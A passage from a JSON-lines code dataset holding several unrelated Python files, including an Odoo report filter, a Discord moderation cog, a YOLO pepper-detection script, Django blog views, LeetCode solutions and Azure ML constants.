max_days,\r\n t_response_arry\r\n ),\r\n parse_mode=\"html\",\r\n message_id=a.message_id,\r\n disable_web_page_preview=True\r\n )\r\n return \r\n try:\r\n users.remove(update.from_user.id)\r\n os.remove(after_download_file_name)\r\n except:\r\n 
pass\r\n","repo_name":"sonicvip/upload","sub_path":"plugins/new_async_fex_v1.py","file_name":"new_async_fex_v1.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1822811899","text":"\"\"\"\n\nContains transcriptions of some IDLUTILS functions to python.\n\n*Source location*:\n $MANGADAP_DIR/python/mangadap/util/idlutils.py\n\n*Python2/3 compliance*::\n\n from __future__ import division\n from __future__ import print_function\n from __future__ import absolute_import\n \n import sys\n if sys.version > '3':\n long = int\n\n*Imports*::\n\n import numpy\n\n*Revision history*:\n | **23 Apr 2015**: Original implementation by K. Westfall (KBW)\n | **20 May 2015**: (KBW) Documentation and Sphinx tests\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport sys\nif sys.version > '3':\n long = int\n\nimport numpy\n\n__author__ = 'Kyle B. Westfall'\n\n#-----------------------------------------------------------------------\ndef airtovac(wave_air):\n \"\"\" \n Wavelengths are corrected for the index of refraction of air under\n standard conditions. Wavelength values below 2000 A will not be\n altered. Uses formula from Ciddor 1996, Applied Optics 62, 958.\n\n Args:\n wave_air (int or float): Wavelength in Angstroms, scalar or\n vector. If this is the only parameter supplied, it will be\n updated on output to contain double precision vacuum\n wavelength(s). \n\n Returns:\n numpy.float64 : The wavelength of the line in vacuum.\n\n Example:\n If the air wavelength is W = 6056.125 (a Krypton line), then\n :func:`airtovac` returns vacuum wavelength of W = 6057.8019.\n \n *Revision history*:\n | Written W. Landsman November 1991\n | Use Ciddor (1996) formula for better accuracy in the infrared \n | Added optional output vector, W Landsman Mar 2011\n | Iterate for better precision W.L./D. Schlegel Mar 2011\n | Transcribed to python, K.B. Westfall Apr 2015\n\n .. note::\n Take care within 1 A of 2000 A. Wavelengths below 2000 A *in\n air* are not altered. 
\n\n \"\"\"\n\n # Copy the data\n wave_vac = wave_air.astype(numpy.float64) if hasattr(wave_air, \"__len__\") else float(wave_air)\n g = wave_vac > 2000.0 # Only modify above 2000 A\n Ng = numpy.sum(g)\n \n if Ng > 0:\n # Handle both arrays and scalars\n if hasattr(wave_air, \"__len__\"):\n _wave_air = wave_air[g].astype(numpy.float64)\n _wave_vac = wave_vac[g]\n else:\n _wave_air = float(wave_air)\n _wave_vac = float(wave_vac)\n\n for i in range(0,2):\n sigma2 = numpy.square(1.0e4/_wave_vac) #Convert to wavenumber squared\n fact = 1.0 + 5.792105e-2/(238.0185 - sigma2) + 1.67917e-3/(57.362 - sigma2)\n _wave_vac = _wave_air*fact\n\n if hasattr(wave_air, \"__len__\"): # Save the result\n wave_vac[g] = _wave_vac\n else:\n wave_vac = _wave_vac\n\n return wave_vac\n\n\n#-----------------------------------------------------------------------\n\n\n","repo_name":"danielgoddard/DanFF_4_David","sub_path":"git_upload/idlutils.py","file_name":"idlutils.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12763534162","text":"\"\"\" init object account.report \"\"\"\n\nimport logging\n\nfrom odoo import models, api\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass AccountReport(models.AbstractModel):\n \"\"\" init object account.report \"\"\"\n _inherit = 'account.report'\n\n @api.model\n def _get_options(self, previous_options=None):\n \"\"\"\n Override Get Options\n :params previous_options:\n \"\"\"\n options = super()._get_options(previous_options)\n groups_map = {}\n if previous_options and previous_options.get('account_groups'):\n groups_map = dict((opt['id'], opt['selected']) for opt in\n previous_options['account_groups'] if\n opt['id'] != 'divider' and 'selected' in opt)\n options['account_groups'] = []\n for group in self.env['account.group'].search([]):\n options['account_groups'].append({\n 'id': group.id,\n 'name': group.name,\n 'selected': groups_map.get(group.id, False),\n })\n return options\n\n @api.model\n def _get_options_account_groups(self, options):\n \"\"\"\n Get options_account_groups\n \"\"\"\n return [group for group in options.get('account_groups', []) if\n group['selected']]\n\n @api.model\n def _get_options_account_groups_domain(self, options):\n \"\"\"\n _get_options_account_groups_domain\n \"\"\"\n selected_account_groups = self._get_options_account_groups(options)\n return selected_account_groups and [\n ('account_id.group_id', 'in',\n [j['id'] for j in selected_account_groups])\n ] or []\n\n @api.model\n def _get_options_domain(self, options):\n \"\"\"\n Override _get_options_domain\n :params options:\n \"\"\"\n domain = super(AccountReport, self)._get_options_domain(options)\n domain += self._get_options_account_groups_domain(options)\n return domain\n\n @api.model\n def _init_filter_analytic(self, options, previous_options=None):\n \"\"\"\n Override _init_filter_analytic\n :param options:\n :param previous_options:\n \"\"\"\n if not self.filter_analytic:\n return\n\n options['analytic'] = self.filter_analytic\n\n if self.user_has_groups('analytic.group_analytic_accounting'):\n options[\n 'analytic_accounts'] = \\\n previous_options and previous_options.get(\n 'analytic_accounts') or []\n analytic_account_ids = [int(acc) for acc in\n options['analytic_accounts']]\n selected_analytic_accounts = \\\n analytic_account_ids and self.env[\n 'account.analytic.account'].browse(analytic_account_ids) \\\n or self.env['account.analytic.account']\n 
options['selected_analytic_account_names'] = \\\n selected_analytic_accounts.mapped('name')\n # analytic_groups\n options['analytic_groups'] = \\\n previous_options and previous_options.get(\n 'analytic_groups') or []\n analytic_groups_ids = [int(accg) for accg in\n options['analytic_groups']]\n selected_analytic_groups = \\\n analytic_groups_ids and self.env['account.analytic.group']. \\\n browse(analytic_groups_ids) \\\n or self.env['account.analytic.group']\n options['selected_analytic_group_names'] = \\\n selected_analytic_groups.mapped('name')\n if self.user_has_groups('analytic.group_analytic_tags'):\n options[\n 'analytic_tags'] = previous_options and previous_options.get(\n 'analytic_tags') or []\n analytic_tag_ids = [int(tag) for tag in options['analytic_tags']]\n selected_analytic_tags = \\\n analytic_tag_ids and self.env['account.analytic.tag'].browse(\n analytic_tag_ids) or self.env['account.analytic.tag']\n options['selected_analytic_tag_names'] = \\\n selected_analytic_tags.mapped('name')\n\n @api.model\n def _get_options_analytic_domain(self, options):\n \"\"\"\n Override to add domain for analytic_groups\n \"\"\"\n domain = super(AccountReport, self)._get_options_analytic_domain(\n options)\n if options.get('analytic_groups'):\n analytic_group_ids = [int(accg) for accg in\n options['analytic_groups']]\n domain.append(('analytic_account_id.group_id', 'in',\n analytic_group_ids))\n\n return domain\n\n def _set_context(self, options):\n \"\"\"\n Override _set_context\n :params options:\n \"\"\"\n ctx = super(AccountReport, self)._set_context(options)\n if options.get('analytic_groups'):\n ctx['analytic_group_ids'] = self.env['account.analytic.group']. \\\n browse([int(accg) for accg in options['analytic_groups']])\n if options.get('account_groups'):\n account_group_ids = [grp.get('id') for grp in\n options.get('account_groups')\n if grp.get('selected')]\n ctx['account_group_ids'] = self.env['account.group'].browse(\n account_group_ids)\n return ctx\n","repo_name":"Emadbox/careone","sub_path":"account_reports_filters/models/account_report.py","file_name":"account_report.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"28069098940","text":"# Model for the bottom station\nfrom typing import NamedTuple\nfrom PyQt5.QtCore import QObject\nfrom PyQt5.QtCore import pyqtSignal\n\nclass BottomStaticData(NamedTuple):\n\n height : int\n label_text : str\n label_width : int\n button_text : str\n button_width : int\n label_width : int\n \n @staticmethod\n def default():\n return BottomStaticData(80, 'Content Path:',100, 'Change', 100)\n\n\nclass BottomStationModel(QObject):\n\n contentPathChanged = pyqtSignal(str)\n\n def __init__(self,\n static_data : BottomStaticData = BottomStaticData.default(),\n dynamic_data : str = ''\n ):\n super().__init__()\n self._static_data = static_data\n self._dynamic_data = dynamic_data\n\n @property\n def static_data(self):\n return self._static_data\n\n @property\n def dynamic_data(self):\n return self._dynamic_data\n\n @dynamic_data.setter\n def dynamic_data(self, value:str):\n self._dynamic_data = value\n self.contentPathChanged.emit(value)","repo_name":"Supasiti/problem_manager","sub_path":"models/bottom_model.py","file_name":"bottom_model.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16987226831","text":"#!/usr/bin/env python3.6\nfrom discord.ext 
import commands\nimport discord\n\nfrom cogs.checks import is_mod, is_server_owner\n\nclass Mod(commands.Cog):\n def __init__(self):\n pass\n\n async def create_mute_role(self, ctx):\n if 'raymond mute' in list(map(lambda r: r.name, ctx.guild.roles)):\n return next((r for r in ctx.guild.roles if r.name == 'raymond mute'), None)\n \n role = await ctx.guild.create_role(name='raymond mute', color=discord.Color(value = 0x522c04))\n\n for channel in ctx.guild.channels:\n overwrite = discord.PermissionOverwrite(send_messages=False)\n\n await channel.set_permissions(role, overwrite=overwrite)\n\n return role\n\n @is_server_owner()\n @commands.command(name='purge')\n async def _purge(self, ctx, limit: int, *, specific_user:discord.Member=None):\n \"\"\"Purges a channel.\n \n If you wish to target one user's messages, **mention** them.\"\"\"\n def check(m):\n if not specific_user:\n return True\n \n return m.author.id == specific_user.id\n \n await ctx.channel.purge(limit=limit, check=check)\n \n @is_mod()\n @commands.command(name='mute')\n async def _mute(self, ctx, *, target:discord.Member):\n \"\"\"Mutes a user.\"\"\"\n mr = await self.create_mute_role(ctx)\n\n await target.add_roles(mr)\n\n await ctx.send(':white_check_mark:')\n\n @is_mod()\n @commands.command(name='unmute')\n async def _unmute(self, ctx, *, target:discord.Member):\n '''Unmutes a user.'''\n mr = next((r for r in ctx.guild.roles if r.name == 'raymond mute'), None)\n\n await target.remove_roles(mr)\n await ctx.send(':ballot_box_with_check:')\n\ndef setup(bot):\n bot.add_cog(Mod())","repo_name":"adx59/raymond","sub_path":"cogs/mod.py","file_name":"mod.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2425197135","text":"import time\nimport cv2\nimport argparse\nimport numpy as np\nfrom urllib.request import urlopen\nimport os.path as path\nfrom urllib.parse import quote\nfrom base64 import b64encode\n\nnames = path.abspath(path.join(__file__ ,\"../../YOLOv3/spydark_yolo.names\"))\nweights = path.abspath(path.join(__file__ ,\"../../YOLOv3/spydark_yolo.weights\"))\ncfg = path.abspath(path.join(__file__ ,\"../../YOLOv3/spydark_yolo.cfg\"))\n\nnet = cv2.dnn.readNet(weights, cfg)\nlayer_names = net.getLayerNames() # returns a list of all layer names (conv,bn,relu,yolo, etc)\noutput_layers = [layer_names[i - 1] for i in net.getUnconnectedOutLayers()] # creates list of yolo layers using indices of yolo layers\n\n\ndef detect_object(fs, filename):\n \n detected = False\n start = time.time()\n\n def draw_prediction(img, class_id, x, y, x_plus_w, y_plus_h):\n label = str(classes[class_id])\n color = (255,0,0)\n cv2.rectangle(img, (x, y), (x_plus_w, y_plus_h), color, 2)\n cv2.putText(img, label, (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\n\n try:\n img_bytes = fs.get_last_version(filename=filename).read()\n image = np.asarray(bytearray(img_bytes), dtype=\"uint8\")\n image = cv2.imdecode(image, cv2.IMREAD_COLOR)\n except Exception:\n print(\"Error in accessing image\")\n return False\n\n width = image.shape[1]\n height = image.shape[0]\n\n # Create a list of all classes in names file\n classes = None\n with open(names, 'r') as f:\n classes = [line.strip() for line in f.readlines()] \n\n blob = cv2.dnn.blobFromImage(image, scalefactor=0.00392, size=(416, 416), mean=(0, 0, 0), swapRB=True, crop=False)\n net.setInput(blob)\n outputs = net.forward(output_layers)\n # outputs contains all information in the image\n\n class_ids = 
[]\n confidences = []\n boxes = []\n\n for output in outputs:\n for detection in output:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n if confidence > 0.5:\n print(\"Object detected, Confidence:\", confidence)\n detected = True\n center_x = int(detection[0] * width)\n center_y = int(detection[1] * height)\n w = int(detection[2] * width)\n h = int(detection[3] * height)\n x = int(center_x - w / 2)\n y = int(center_y - h / 2)\n class_ids.append(class_id)\n confidences.append(float(confidence))\n boxes.append([x, y, w, h])\n\n # Applying non-max suppression\n indices = cv2.dnn.NMSBoxes(boxes, confidences, score_threshold=0.5, nms_threshold=0.4) # returns indices of labels that are not suppressed\n\n # Putting bounding boxes and label\n no_objects_detected = len(boxes)\n for i in range(no_objects_detected):\n if i in indices:\n x, y, w, h = boxes[i]\n draw_prediction(image, class_ids[i], round(x), round(y), round(x + w), round(y + h))\n\n cv2.imshow(\"object detection\", image)\n\n end = time.time()\n print(\"YOLO Execution time: \" + str(end-start) + \"\\n\")\n\n cv2.waitKey(2000)\n\n cv2.destroyAllWindows()\n\n return detected","repo_name":"swapneelparanjpe/Spydark","sub_path":"filters/img_detect.py","file_name":"img_detect.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"73585456401","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\n@author: delu\n@file: service.py\n@time: 18/9/6 11:50\n\"\"\"\nimport tornado.gen\n\nfrom base.service import ServiceBase\n\n\nclass Service(ServiceBase):\n \"\"\"\n service\n \"\"\"\n\n def __init__(self):\n \"\"\"\n 对象初始化方法\n 添加你需要使用的model\n 格式 项目model文件夹下的文件名或者 包名1.包名2.文件名 (无.py后缀)\n \"\"\"\n pass\n\n @tornado.gen.coroutine\n def create_group(self, params={}):\n \"\"\"\n 创建分组\n :param params: \n :return: \n \"\"\"\n if self.common_utils.is_empty(['parent_group_id', 'group_name', 'user_id'], params):\n raise self._gre('PARAMS_NOT_EXIST')\n\n parent_height_result = yield self.query_group_single({'group_id': params['parent_group_id']})\n\n if parent_height_result['code'] != 0:\n raise self._gr(parent_height_result)\n\n params['height'] = parent_height_result['data'] + 1\n\n result = yield self.do_model('blog.group.model', 'create_group', params)\n\n if not result:\n raise self._gre('SQL_EXECUTE_ERROR')\n\n result['height'] = params['height']\n\n raise self._grs(result)\n\n @tornado.gen.coroutine\n def query_group(self, params):\n \"\"\"\n 查询分组及所有子分组\n :param params: \n :return: \n \"\"\"\n if self.common_utils.is_empty(['user_id'], params):\n raise self._gre('PARAMS_NOT_EXIST')\n\n group_list = yield self.do_model('blog.group.model', 'query_group_list', params)\n\n if not group_list:\n raise self._gre('GROUP_NOT_FOUND')\n\n # 构造一个树\n # 转成group字典\n parent_group_dict = {}\n for group in group_list:\n\n parent_group_id = group['parent_group_id']\n\n if parent_group_id in parent_group_dict:\n\n parent_group_dict[parent_group_id].append(group)\n else:\n parent_group_dict[parent_group_id] = [group]\n\n # 从根节点开始构造整棵树\n root_group_list = self.__build_group_tree_list(-1, parent_group_dict)\n\n raise self._grs(root_group_list)\n\n def __build_group_tree_list(self, parent_group_id, parent_group_dict):\n \"\"\"\n 从group_list中构造一颗树\n :param parent_group_id: \n :param parent_group_dict: \n :return: \n \"\"\"\n final_group_list = []\n\n if parent_group_id not in parent_group_dict:\n return []\n\n child_group_list = 
parent_group_dict[parent_group_id]\n\n for group in child_group_list:\n group['sub_group_list'] = self.__build_group_tree_list(group['group_id'], parent_group_dict)\n\n final_group_list.append(group)\n\n return final_group_list\n\n @tornado.gen.coroutine\n def update_group(self, params):\n \"\"\"\n 更新分组\n :param params: \n :return: \n \"\"\"\n if self.common_utils.is_empty(['group_id', 'group_name', 'user_id'], params):\n raise self._gre('PARAMS_NOT_EXIST')\n\n result = yield self.do_model('blog.group.model', 'update_group', params)\n\n if not result:\n raise self._gre('SQL_EXECUTE_ERROR')\n\n raise self._grs()\n\n @tornado.gen.coroutine\n def delete_group(self, params):\n \"\"\"\n 删除分组\n :param params: \n :return: \n \"\"\"\n if self.common_utils.is_empty(['group_id', 'user_id'], params):\n raise self._gre('PARAMS_NOT_EXIST')\n\n group_list = yield self.do_model('blog.group.model', 'query_group_list', params)\n\n if not group_list:\n raise self._gre('GROUP_NOT_FOUND')\n\n # 构造一个树\n # 转成group字典\n parent_group_dict = {}\n for group in group_list:\n\n parent_group_id = group['parent_group_id']\n\n if parent_group_id in parent_group_dict:\n\n parent_group_dict[parent_group_id].append(group)\n else:\n parent_group_dict[parent_group_id] = [group]\n\n root_group_list = self.__build_group_tree_list(int(params['group_id']), parent_group_dict)\n\n final_group_list = self.__tree_parse_list(root_group_list)\n\n group_id_list = [group['group_id'] for group in final_group_list]\n\n group_id_list.append(params['group_id'])\n\n result = yield self.do_model(\n 'blog.group.model',\n 'delete_group',\n {\n 'group_id_list': group_id_list,\n 'user_id': params['user_id']\n })\n\n raise self._grs(result)\n\n def __tree_parse_list(self, group_list):\n \"\"\"\n 将树形结构转换成列表结构\n :param group_list: \n :return: \n \"\"\"\n final_group_list = []\n\n for group in group_list:\n\n final_group_list.append(group)\n\n final_group_list.extend(self.__tree_parse_list(group['sub_group_list']))\n\n return final_group_list\n\n @tornado.gen.coroutine\n def query_group_single(self, params):\n \"\"\"\n 查询单个分组\n :param params: \n :return: \n \"\"\"\n if self.common_utils.is_empty(['group_id'], params):\n raise self._gre('PARAMS_NOT_EXIST')\n\n group_result = yield self.do_model('blog.group.model', 'query_group_single', params)\n\n if group_result is False:\n raise self._grs('')\n\n height = 0\n\n if group_result:\n\n height = group_result['height']\n\n raise self._grs(height)\n","repo_name":"deluhorse/blog-python-","sub_path":"v3/module/blog/group/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5081450993","text":"from typing import List\n\n# Runtime: 79 ms, faster than 5.45% of Python3 online submissions for Subsets.\n# Memory Usage: 14.4 MB, less than 79.30% of Python3 online submissions for Subsets.\n\n\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n ans = []\n nums.sort()\n start = nums[0]-1\n prev_nums = []\n\n def dfs(nums, start):\n for num in nums:\n if num > start:\n prev_nums.append(num)\n ans.append(prev_nums[:])\n start = num\n dfs(nums, start)\n prev_nums.pop()\n dfs(nums, start)\n ans.append([])\n return ans\n","repo_name":"huckjoo/swjungle_alg","sub_path":"leetcode/78.py","file_name":"78.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 
+{"seq_id":"19857612920","text":"from django.shortcuts import render, redirect\nfrom .models import ArticlePost\nimport markdown\nfrom django.http import HttpResponse\n\nfrom django.http import HttpResponse\nfrom .forms import ArticlePostForm\nfrom django.contrib.auth.models import User\n\ndef article_list(request):\n articles = ArticlePost.objects.all()\n context = {'articles': articles}\n return render(request, 'article/list.html', context)\n\ndef article_detail(request, id):\n article = ArticlePost.objects.get(id=id)\n article.body = markdown.markdown(article.body,\n extensions=[\n 'markdown.extensions.extra',\n 'markdown.extensions.codehilite',\n ])\n context = {'article': article}\n return render(request, 'article/detail.html', context)\n\n\ndef article_create(request):\n if request.method == \"POST\":\n # 将提交的数据赋值到表单示例中\n article_post_form = ArticlePostForm(data=request.POST)\n # 判断提交的数据是否满足模型要求\n if article_post_form.is_valid():\n # 保存数据,暂时不提交到数据库中\n new_article = article_post_form.save(commit=False)\n # 指定数据库中id=1的用户作为作者\n # 如果你进行过删除数据表的操作,可能会找不到id=1的用户\n # 此时请重新创建用户,并传入此用户的ID\n new_article.author = User.objects.get(id=1)\n # 将文章保存到数据库中\n new_article.save()\n # 完成后返回文章列表\n return redirect(\"article:article_list\")\n else:\n return HttpResponse(\"表单内容有误,请重新填写\")\n else:\n # 创建表单类示例\n article_post_form = ArticlePostForm()\n context = {'article_post_form': article_post_form}\n return render(request, 'article/create.html', context)\n\ndef article_delete(request,id):\n # 根据id获取需要删除的文章\n article = ArticlePost.objects.get(id=id)\n # 调用delete方法删除文章\n article.delete()\n # 完成删除后返回文章列表\n return redirect(\"article:article_list\")\n\n# 安全删除文章\ndef article_safe_delete(request, id):\n if request.method == 'POST':\n article = ArticlePost.objects.get(id=id)\n article.delete()\n return redirect(\"article:article_list\")\n else:\n return HttpResponse(\"仅允许post请求\")\n\ndef article_update(request, id):\n \"\"\"\n 更新文章视图函数\n 通过post方式提交表单,更新title,body字段\n GET方法进入初识话表单页面\n id: 文章的Id\n \"\"\"\n #获取需要修改为的文章对象\n article = ArticlePost.objects.get(id=id)\n # 判断是否使用post方式提交表单\n if request.method == \"POST\":\n # 将提交的数据赋值到表单示例\n article_post_form = ArticlePostForm(data=request.POST)\n # 判断提交的数据是否满足模型要求\n if article_post_form.is_valid():\n # 保存新写入的title、body 数据并保存\n article.title = request.POST['title']\n article.body = request.POST['body']\n article.save()\n # 完成购返回修改后的文章中,需传入文章ID\n return redirect(\"article:article_detail\", id=id)\n # 如果这个数据不合法,返回错误信息\n else:\n return HttpResponse(\"表单内容有误,请重新填写。\")\n # 如果用户GET请求获取数据\n else:\n # 创建表单类示例\n article_post_form = ArticlePostForm()\n # 赋值上下文,将article文章对象也传递进去,以便的内容\n context = {'article': article, 'article_post_form': article_post_form}\n # 将响应返回到模板中\n return render(request, 'article/update.html', context)","repo_name":"TrellixVulnTeam/jdango-blog_OM48","sub_path":"blog/article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30544609012","text":"FEATURE_NAME_COLUMN = 'feature_name'\nGROUP_COLUMN = 'group'\nGROUP_PIVOT_COLUMN = 'group_pivot'\nFEATURE_CATEGORY_COLUMN = 'data_type'\nMETRIC_NAME_COLUMN = 'metric_name'\nMETRIC_VALUE_COLUMN = 'metric_value'\n\n# Column Names of Histogram\nBUCKET_COUNT_COLUMN = 'bucket_count'\nCATEGORY_BUCKET_COLUMN = 'category_bucket'\nFEATURE_BUCKET_COLUMN = 'feature_bucket'\nFEATURE_TYPE_COLUMN = 'feature_type'\nLOWER_BOUND_COLUMN = 'lower_bound'\nUPPER_BOUND_COLUMN = 'upper_bound'\n\n# Error 
Messages\nMESSAGE_TO_CONTACT_AML = 'Please contact Microsoft support for assistance.'\n\n# Filenames\nMETA_FILENAME = '.meta'\nMETRICS_FILENAME = 'metrics.json'\n\n# Others\nCATEGORICAL_FEATURE_CATEGORY = 'categorical'\nNUMERICAL_FEATURE_CATEGORY = 'numerical'\nUTF8_ENCODING = 'utf-8'\n\n# Parameters for Outputs of Output Metrics Component\nBASELINE_COUNT_PARAM = 'baselineCount'\nCATEGORICAL_PARAM = 'categorical'\nCATEGORY_PARAM = 'category'\nFEATURE_CATEGORY_PARAM = 'featureCategory'\nFEATURE_FILES_PARAM = 'featureFiles'\nFEATURE_NAME_PARAM = 'featureName'\nHISTOGRAM_PARAM = 'histogram'\nLOWER_BOUND_PARAM = 'lowerBound'\nMETRIC_VALUE_PARAM = 'metricValue'\nMETRICS_FILE_PARAM = 'metricsFile'\nMETRICS_PARAM = 'metrics'\nMETRICS_TYPE_PARAM = 'metricsType'\nNUMERICAL_PARAM = 'numerical'\nTARGET_COUNT_PARAM = 'targetCount'\nUPPER_BOUND_PARAM = 'upperBound'\nVERSION_PARAM = 'version'\n\n# Values for Outputs of Output Metrics Component\nMETADATA_VERSION = '1.0.0'\n\n# Model types\nCLASSIFICATION = 'classification'\nREGRESSION = 'regression'\n\n# Column names/values for feature attribution drift and feature importance\nFEATURE_COLUMN = 'feature'\nROW_COUNT_COLUMN_NAME = 'RowCount'\nTHRESHOLD_VALUE = 'threshold_value'\n","repo_name":"raoxiang1996/azureml-assets","sub_path":"assets/model_monitoring/components/src/shared_utilities/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"7495787866","text":"import math\nfrom typing import List\n\n\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n result = []\n used = set()\n\n def dfs(memo: List[int]) -> None:\n if len(memo) == len(nums):\n result.append(list(memo))\n return\n\n for i, num in enumerate(nums):\n if i in used:\n continue\n\n curr = num\n used.add(i)\n memo.append(curr)\n dfs(memo)\n memo.pop()\n used.remove(i)\n\n dfs([])\n return result\n\n\n\"\"\"\nExplanation:\n\nInitialize result array to store final permutations and used set to store visited elements. Create a function called dfs which takes memo as input. If the size of memo is equal to the length of nums, push the current permutation to result. For each number in nums, if it's not already in used, add it to memo and used, call the dfs function with the updated memo, and then remove it from memo and used to backtrack. The final result will contain all the permutations.\n\nNotes:\n\nTime Complexity: O(n! * n), since we create a copy of the current permutation every time we find a valid permutation. Since the length of the permutation is n, creating a copy takes O(n) time, and we do this for each of the n! permutations, resulting in a total time complexity of O(n! * n).\n\nSpace Complexity: O(n! * n), since we create a new list of length n for each permutation, and there are n! possible permutations. Therefore, the total space required is n! * n. Additionally, we use a set to store the indices of used elements, which requires at most O(n) space. Overall, the space complexity is O(n! * n + n), which simplifies to O(n! 
* n).\n\"\"\"\n\n# Test 1: Single element\nnums = [1]\nresult = Solution().permute(nums)\nresult_len = len(result) == len(nums)\nsame_inner_len = all(len(p) == len(nums) for p in result)\nunique_inner_nums = all(set(p) == set(nums) for p in result)\nassert result_len, f\"Expected same_outer_len to equal True but got {result_len}\"\nassert same_inner_len, f\"Expected same_inner_len to equal True but got {same_inner_len}\"\nassert unique_inner_nums, f\"Expected unique_inner_nums to equal True but got {unique_inner_nums}\"\n\n# Test 2: Two elements\nnums = [1, 2]\nresult = Solution().permute(nums)\nresult_len = len(result) == len(nums)\nsame_inner_len = all(len(p) == len(nums) for p in result)\nunique_inner_nums = all(set(p) == set(nums) for p in result)\nassert result_len, f\"Expected same_outer_len to equal True but got {result_len}\"\nassert same_inner_len, f\"Expected same_inner_len to equal True but got {same_inner_len}\"\nassert unique_inner_nums, f\"Expected unique_inner_nums to equal True but got {unique_inner_nums}\"\n\n# Test 2: Greater than two elements\nnums = [1, 2, 3]\nresult = Solution().permute(nums)\nsame_inner_len = all(len(p) == len(nums) for p in result)\nunique_inner_nums = all(set(p) == set(nums) for p in result)\nassert len(result) == math.factorial(\n len(nums)), f\"Expected 6 but got {len(result)}\"\nassert same_inner_len, f\"Expected same_inner_len to equal True but got {same_inner_len}\"\nassert unique_inner_nums, f\"Expected unique_inner_nums to equal True but got {unique_inner_nums}\"\n\n# Test 3: Max elements\nnums = [1, 2, 3, 4, 5, 6]\nresult = Solution().permute(nums)\nsame_inner_len = all(len(p) == len(nums) for p in result)\nunique_inner_nums = all(set(p) == set(nums) for p in result)\nassert len(result) == math.factorial(\n len(nums)), f\"Expected 720 but got {len(result)}\"\nassert same_inner_len, f\"Expected same_inner_len to equal True but got {same_inner_len}\"\nassert unique_inner_nums, f\"Expected unique_inner_nums to equal True but got {unique_inner_nums}\"\n","repo_name":"garofalof/algopractice_python","sub_path":"medium/46_Permutations.py","file_name":"46_Permutations.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41734675451","text":"'''\n\t[문제] \n\t\t철수는 일정한 빠르기로 운동장을 도는데 4바퀴에 56분이 걸린다. \n\t\t민수는 일정한 빠르기로 운동장을 도는데 7바퀴에 1시간 24분이 걸린다. 
\t\n\t\t철수와 민수가 똑같이 3바퀴를 돈다면 그 차이는 몇 분 인지 구하시오.\n\t\t\n\t[정답] \n\t\t6 또는 -6\n'''\nchulsu_time = 56\nchulsu = chulsu_time // 4\nminsu_time = 84\nminsu = minsu_time // 7\n\nanswer1 = (chulsu*3) - (minsu*3)\nanswer2 = (minsu*3) - (chulsu*3)\nprint(answer1,\"분\",\"또는\",answer2,\"분\")\n","repo_name":"wisline97/keduit_frontend","sub_path":"02_python/수업자료/수업시간 내 진행/C변수/변수4_문제/변수4_문제_달리기속도_문제.py","file_name":"변수4_문제_달리기속도_문제.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36053535260","text":"import os\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pyrealsense2 as rs\n# from realsense_camera import *\nimport pepper_fruit_utils, pepper_utils\nfrom PIL import Image\n\ndef get_img_size(img_path):\n img = read_image(img_path)\n return img.shape\n\n\ndef get_all_image_path_in_folder(path):\n # print(\"I am at\", os.getcwd())\n # print('I want ', os.getcwd()+path)\n img_list = list()\n for dirs, subdir, files in os.walk(os.getcwd()+path):\n for file_name in files:\n if file_name.endswith(\".jpeg\") or file_name.endswith(\".jpg\") or file_name.endswith(\".png\"):\n rgb_file = dirs + os.sep + file_name\n img_list.append(rgb_file)\n # print(\"all images in folder: \", img_list)\n return img_list[:]\n\n\ndef read_image(img_path):\n img = cv2.imread(img_path)\n img = np.asarray(img)\n return img\n\n\ndef put_title(detected_frame):\n # displaying the title\n plt.title(\n label=f\"Pepper: {len(detected_frame.pepper_fruit_detections)} Peduncle: {len(detected_frame.pepper_peduncle_detections)}\",\n fontsize=10,\n color=\"black\")\n \n\ndef get_image_from_webcam():\n camera = cv2.VideoCapture(0)\n # camera = cv2.VideoCapture(0)\n # 4: dotted camera\n # 6: rgb camera\n while True:\n return_value, image = camera.read()\n # gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n image = cv2.flip(image, 1) # <class 'numpy.ndarray'>\n cv2.imshow('image', image)\n k = cv2.waitKey(0)\n if k==27:\n print(\"hey\")\n camera.release()\n cv2.destroyAllWindows()\n return image\n # break\n camera.release()\n cv2.destroyAllWindows()\n return image\n\ndef get_image_from_realsense():\n # Configure depth and color streams\n pipeline = rs.pipeline()\n config = rs.config()\n\n # Get device product line for setting a supporting resolution\n 